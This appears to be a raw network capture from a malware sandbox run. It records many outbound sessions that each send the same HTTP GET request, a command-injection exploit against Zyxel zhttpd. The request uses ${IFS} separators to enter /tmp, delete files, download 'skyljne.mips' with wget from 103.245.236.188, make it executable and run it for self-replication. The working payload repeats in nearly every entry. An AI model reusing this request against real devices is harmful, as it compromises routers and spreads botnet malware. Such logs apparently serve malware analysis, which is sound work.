                                                Jan 12, 2024 18:16:18.325078011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3127192.168.2.2345792114.213.94.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325124979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3128192.168.2.235157459.254.136.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325182915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3129192.168.2.2336478148.93.57.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325208902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3130192.168.2.2338876132.197.166.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325231075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3131192.168.2.2342220163.184.56.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325290918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3132192.168.2.2350992128.69.227.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325337887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3133192.168.2.23586188.146.130.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325365067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3134192.168.2.234954472.95.147.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325402975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3135192.168.2.2344726211.149.60.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325428009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3136192.168.2.23388389.183.240.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325453043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3137192.168.2.235493495.244.165.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325509071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3138192.168.2.2340390213.235.200.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325544119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3139192.168.2.235257262.5.25.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325591087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3140192.168.2.2338616200.220.105.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325625896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3141192.168.2.2350340123.247.87.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325655937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3142192.168.2.2343358216.138.238.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325692892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3143192.168.2.2335272132.173.205.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325721979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3144192.168.2.2344744180.42.152.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325769901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3145192.168.2.2344674208.176.89.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325798988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3146192.168.2.2340396104.200.134.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325831890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3147192.168.2.2352228128.50.100.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325860977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3148192.168.2.235617623.157.229.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325910091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3149192.168.2.2344228187.108.239.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.325947046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3150192.168.2.2347360167.86.124.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326004028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3151192.168.2.2337220143.61.229.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326047897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3152192.168.2.2349730221.64.209.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326093912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3153192.168.2.2340808161.145.176.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326144934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3154192.168.2.2333638218.81.248.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326176882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3155192.168.2.234635475.162.61.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326208115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3156192.168.2.233303895.47.169.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326226950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3157192.168.2.2343862202.40.114.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326289892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3158192.168.2.2356968157.225.172.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326289892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3159192.168.2.233837850.102.69.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326354027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3160192.168.2.233824662.20.100.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326381922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3161192.168.2.2358918143.116.196.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326411009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3162192.168.2.2357534152.233.117.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326456070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3163192.168.2.234854093.6.220.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326478958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3164192.168.2.233354484.222.108.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326533079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3165192.168.2.235902851.234.219.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326565981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3166192.168.2.235770048.118.136.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326601028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3167192.168.2.2357498169.204.53.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326653957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3168192.168.2.2348764213.48.21.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326694012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3169192.168.2.2345184122.9.160.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326741934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3170192.168.2.234818097.255.103.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326787949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3171192.168.2.2340888147.5.107.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326808929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3172192.168.2.2348130185.219.26.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326857090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3173192.168.2.2347430102.39.53.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326911926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3174192.168.2.2360382183.249.5.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.326962948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3175192.168.2.2336582180.170.216.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327011108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3176192.168.2.233963888.220.164.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327059984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3177192.168.2.2344010174.184.33.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327109098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3178192.168.2.2337378171.74.225.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327147961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3179192.168.2.234566040.87.96.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327182055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3180192.168.2.2338800116.6.182.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327229023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3181192.168.2.234882438.35.110.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327266932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3182192.168.2.234486031.39.181.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327289104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3183192.168.2.234061038.250.189.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327346087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3184192.168.2.2357862162.213.64.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327379942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3185192.168.2.2344876153.77.157.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327429056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3186192.168.2.235060645.231.233.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327461958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3187192.168.2.235211865.253.81.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327486038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3188192.168.2.233816812.147.76.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.327552080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3189192.168.2.2353534204.155.41.232443
                                                TimestampBytes transferredDirectionData
